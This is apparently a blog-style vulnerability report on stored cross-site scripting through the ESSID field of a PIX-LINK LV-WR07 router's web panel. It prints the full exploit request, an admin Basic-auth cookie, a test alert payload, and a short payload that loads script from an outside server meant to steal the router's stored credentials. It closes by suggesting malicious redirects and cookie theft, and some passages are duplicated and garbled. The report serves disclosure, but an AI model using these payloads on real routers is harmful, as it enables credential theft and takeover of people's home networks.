Report Vulnerability
Product: PIX-LINKModel: LV-WR07
Vulnerability: Stored Cross-site scripting (XSS)
Impact: Stolen credentials router and inject malicious JavaScript
PoC
In the "BASIC SETTINGS" option in Router Panel has an input ESSID. This flag able to inject JavaScript.
Bellow the request:
GET /wireless.htm?CMD=WL_BASIC&GO=wireless.htm&SET0=82247936=1&SET1=70451456=9&SET2=71041536=PAYLOAD_XSS&SET3=70713600=3&SET4=67567872=0&SET5=76743168=0;0;0;0&SET6=70648064=1&SET7=71762176=1&SET8=71368960=1&SET9=82051328=1&SET10=81002752=0&SET11=76939776=OPEN;OPEN;OPEN;OPEN&SET12=71893504=NONE;NONE;NONE;NONE&SET13=77201920=12345678&SET14=70910464=1;1;1;1&SET15=76546304=1&SET16=76611840=1&SET17=75956480=1&SET18=76677632=scaptest&SET19=70582784=0;0;0;0&SET20=68288768=100&rd=0.09415532139725702&_=1595340582749 HTTP/1.1Inject a simples XSS Payload: <script>alert('xss')</script>
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/wireless.htm
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: Authorization=Basic YWRtaW46SGFja0FsbA==
With information bellow in the "pass.htm" and "index.htm" could be stolen.
Now we create a server with a script that stolen sensitive data at Router.
Http://xf5.fun/a.php
I create a simples script, but you can create a complex script with the information above.
Obs: SSID has the ability to store able 32 characters, so need to create a short payload.
Result:
Now we create a server with a script that stolen sensitive data at Router.
Http://xf5.fun/a.php
I create a simples script, but you can create a complex script with the information above.
Obs: SSID has the ability to store able 32 characters, so need to create a short payload.
<script scr=//xf5.fun></script>
Result:
You can use redirect malicious, a stolen cookie with base 64 credentials, just use imagination.
Nenhum comentário:
Postar um comentário